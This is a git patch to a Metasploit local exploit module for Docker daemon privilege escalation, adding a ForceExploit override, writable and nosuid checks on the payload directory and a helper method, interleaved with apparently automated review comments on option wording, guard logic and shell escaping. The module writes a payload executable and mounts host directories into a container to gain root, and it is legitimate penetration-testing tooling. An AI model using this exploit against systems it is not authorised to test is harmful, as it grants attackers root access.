From 20fd6b6134838fcaa2a2f31f0092c22e73c34b76 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Fri, 11 Jan 2019 22:41:14 +0000 Subject: [PATCH] Add check for writable and nosuid WritableDir --- .../docker_daemon_privilege_escalation.rb | 31 +++++++++++++++++-- 1 file changed, 29 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb index 59ed4e51f8..2b3b626a1b 100644 --- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb +++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb @@ -29,12 +29,18 @@ class MetasploitModule < Msf::Exploit::Local } )) register_advanced_options([ + OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"]) ]) end + def base_dir + datastore['WritableDir'].to_s + end + def check if cmd_exec('docker ps && echo true') =~ /true$/ + print_good("Docker daemon is accessible.") Exploit::CheckCode::Vulnerable else print_error("Failed to access Docker daemon.") 
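Review bot: The `ForceExploit` description, 'Override check result', understates what the option does, because the `exploit` hunk of this same patch also uses it to bypass the `is_root?` guard. Wording it as `OptBool.new('ForceExploit', [false, 'Override check result and the already-root guard', false])` would make the option text match the behaviour. The new `base_dir` helper has no comment; a one-liner such as `# Directory from the WritableDir advanced option, always returned as a String` would record why `.to_s` is there. The `else` branch of `check` continues outside the hunk.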
@@ -43,8 +49,29 @@ class MetasploitModule < Msf::Exploit::Local end def exploit + unless check == CheckCode::Vulnerable + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + if nosuid? base_dir + fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid" + end + pl = generate_payload_exe - exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}" + exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}" print_status("Writing payload executable to '#{exe_path}'") write_file(exe_path, pl) @@ -59,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Local end def shell_script(exploit_path) - deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']] + deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir] dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ") %Q{
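Review bot: The two `ForceExploit` overrides at the top of `exploit` are inconsistent: overriding a failed check prints a warning, while overriding the `is_root?` guard prints nothing, and the `unless` nested inside `if is_root?` is harder to read than a single condition. A flatter form is `fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' if is_root? && !datastore['ForceExploit']`, with a `print_warning` on the forced path to mirror the first guard. `is_root?`, `writable?` and `nosuid?` are called here but the patch adds no `include`, so they presumably come from mixins declared outside the visible hunks; that is worth confirming, since a missing mixin would only surface as a NoMethodError at run time. The body of `exploit` continues outside the hunk.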
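Review bot: `base_dir` is an operator-supplied string that ends up unquoted in the `-v #{dep}:#{dep}` arguments built on the following context line, so a WritableDir containing spaces or shell metacharacters changes how the resulting command line is parsed. Escaping each path when the option string is built keeps it a single argument, for example `dep_options = deps.uniq.map { |dep| "-v #{Shellwords.escape("#{dep}:#{dep}")}" }.join(" ")`, assuming `Shellwords` is loaded in this file. The same value is interpolated into `exe_path` in the `exploit` hunk. The `%Q{` string that forms the rest of `shell_script` continues outside the hunk.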